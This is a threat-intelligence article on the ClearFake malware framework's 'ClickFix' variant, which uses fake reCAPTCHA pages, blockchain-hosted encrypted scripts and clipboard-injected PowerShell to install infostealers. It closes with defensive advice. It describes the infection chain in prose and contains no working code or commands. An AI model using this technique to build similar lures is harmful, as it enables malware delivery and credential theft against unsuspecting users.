Threats New ClearFake Variant "ClickFix" Uses Fake reCAPTCHA To Infect Victims

ClearFake is a malicious JavaScript framework first discovered in mid-2023 that targets unsuspecting users who visit compromised websites. Its primary goal is to infect victims with information-stealing malware such as Lumma Stealer, Vidar Stealer, and Emmenhtal Loader via Social Engineering tactics. By using fake error messages and fraudulent update prompts displayed in the browser, ClearFake exploits human behavior to bypass traditional security defenses.

A new variant of ClearFake emerged in late 2024, introducing a more convincing social engineering technique known as “ClickFix.” This updated version tricks users with fake reCAPTCHA or Cloudflare Turnstile verifications, ultimately leading them to run clipboard-injected PowerShell commands that download malware directly onto their systems. Notably, in addition to Emmenhtal and Lumma Stealer, ClearFake was observed distributing Vidar Stealer in January 2025.

In this article, we’ll examine the evolution of ClearFake and explore how the new variant leverages blockchain-based code delivery, encrypted lures hosted on Cloudflare Pages, and Web3 smart contract interactions. We’ll break down the infection chain, review the campaign’s real-world impact, and offer guidance on how to defend against this rapidly evolving threat.

What is web3?

Web3 refers to the next evolution of the internet that leverages blockchain technology to create decentralized applications (dApps). Instead of relying on centralized servers, Web3 platforms use smart contracts on blockchains like Ethereum or Binance Smart Chain to store and execute code. In the context of ClearFake, attackers exploit Web3 features—such as smart contract Application Binary Interfaces (ABIs)—to host and retrieve malicious code in a way that's difficult for defenders to detect.

However, most mainstream browsers like Google Chrome, Firefox, Safari, and Edge do not come with built-in Web3 support. They can render dApps (decentralized apps) as normal websites, but they do not directly interact with blockchains or smart contracts out of the box. To use Web3 features, users typically rely on browser extensions such as MetaMask or Binance Wallet Extension.

New ClearFake, New Techniques

First discovered in mid-2023, ClearFake is a malicious JavaScript framework designed to deliver infostealer malware through compromised websites, fake update prompts, and cleverly crafted PowerShell lures. Its primary objective has consistently been to infect users with payloads like Lumma Stealer and Vidar Stealer by tricking them into executing malicious code themselves.

Since December 2024, researchers have observed a new ClearFake campaign, with a new social engineering technique known as “ClickFix.” This technique relies on fake reCAPTCHA or Cloudflare Turnstiles to coerce victims, and a deeper integration with blockchain-based infrastructure to host malware payloads.

Here is a description of the ClickFix attack using new variant of ClearFake:

• JavaScript injected into compromised websites: Small loader scripts are inserted into compromised WordPress sites to initiate the infection chain. When a user visits the page, Javascript is injected which will display the "lure", a social engineering trick such as error message, update warning, or in the new campaign, a human verification check.

• Encrypting the ClickFix HTML code: The lure HTML is encrypted using AES-GCM and base64 encoding, making static detection more difficult. By encrypting the payload, malware scanners looking for malicious code in the browser can be bypassed.

• Hosting payloads on Cloudflare Pages: The encrypted HTML code is stored on Cloudflare Pages, giving the malware delivery infrastructure a layer of legitimacy and reliability, making it more difficult to detect.

• Abusing Binance Smart Chain (BSC) via Smart Contract ABIs: Uses Web3 in the browser to interact with smart contracts on BSC. The victim's browser fetches gzip-compressed and base64-encoded JavaScript, decrypts it with AES keys, and extracts the deceptive HTML code and malicious PowerShell commands. The JavaScript dynamically decrypts and injects the ClickFix HTML lure into a fullscreen iframe to obscure the original site, which displays a reCAPTCHA or CloudFlare Turnstiles human verification check.

• Copied PowerShell command to clipboard: Once the lure was displayed, a malicious PowerShell command was silently copied to the user's clipboard.

• Tricked users into executing the command: Instead of asking the user to click some images or otherwise assessing their behavior as a normal bot detection tool would, the ClickFix tool prompts the user into pressing a sequence of keys on their keyboard. These keystrokes are hotkeys designed to open a command terminal, paste in the contents of the clipboard, and execute them via Powershell. This technique can even bypass endpoint protection mechanisms such as malware scanners by instructing users to manually run malicious PowerShell commands.

What's the Impact of ClearFake So Far?

In October 2024, the U.S. The Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center (HC3) issued a detailed report for healthcare industry stakeholders about the risk posed by ClearFake. Here are some campaigns mentioned in the report:

• March 2024 – TA571 conducted phishing email campaigns targeting general users with HTML attachments mimicking Microsoft Word documents. These displayed fake error messages leading to ClickFix malware execution.

• May 2024 – ClearFake introduced the ClickFix tactic on compromised websites, displaying fake browser alerts that trick users into running PowerShell malware.

• August 2024 – ClickFix was used across a large malicious infrastructure hosting fake CAPTCHA pages, targeting users redirected from cracked software sites and fake Zoom/Google Meet pages. These lures simulated audio hardware errors to deceive users.

• August 2024: A phishing campaign targeted the transport and logistics sector, redirecting victims to ClickFix lures distributing DanaBot malware.

• September 2024: A phishing campaign targeted GitHub developers by creating fake issues warning of vulnerabilities, leading victims to download Lumma Stealer from fake CAPTCHA pages.

• September 2024: Another ClickFix lure was discovered impersonating Facebook, displaying a fake browser issue.

By early 2025, ClearFake had infected over 9,300 websites, primarily targeting WordPress installations. In February 2025, security firm Arctic Wolf reported ClearFake infections on HEP2go, a popular video platform used by physical therapists. Visitors attempting to browse the site were redirected to fake CAPTCHA pages that initiated the malware chain. ClearFake is now being used to deliver a wide variety of commodity malware families, including Lumma Stealer, Vidar Stealer, Emmenhtal Loader, XWorm, AsyncRAT, NetSupport RAT, and VenomRAT. 

In the past couple years, over 100 car dealership websites were indirectly compromised via a third-party video provider (LES Automotive), in what appears to be a supply chain attack delivering ClickFix lures and the SectopRAT malware. Threat actor TA571 has reportedly adopted similar techniques, distributing fake Microsoft Office error messages with embedded HTML lures that trigger the ClickFix infection chain.

How to Protect Yourself From ClickFix

To defend against ClickFix attacks, users should never follow instructions to run commands like PowerShell or MSHTA from suspicious websites or pop-ups.

Organizations can reduce risk by disabling the Windows Run dialog (Win+R) via Group Policy, blocking MSHTA execution, and educating employees on social engineering tactics. Endpoint protection tools with behavior-based detection and clipboard monitoring can also help detect and block these threats before they execute.

Conclusion

The latest ClearFake variant demonstrates a dangerous evolution in social engineering and malware delivery, combining fake CAPTCHA lures with blockchain-hosted payloads. By tricking users into executing clipboard-injected PowerShell commands, the campaign spreads infostealers like Lumma and Vidar. As ClearFake continues to grow in scale and sophistication, awareness and strong endpoint protections are essential for defense.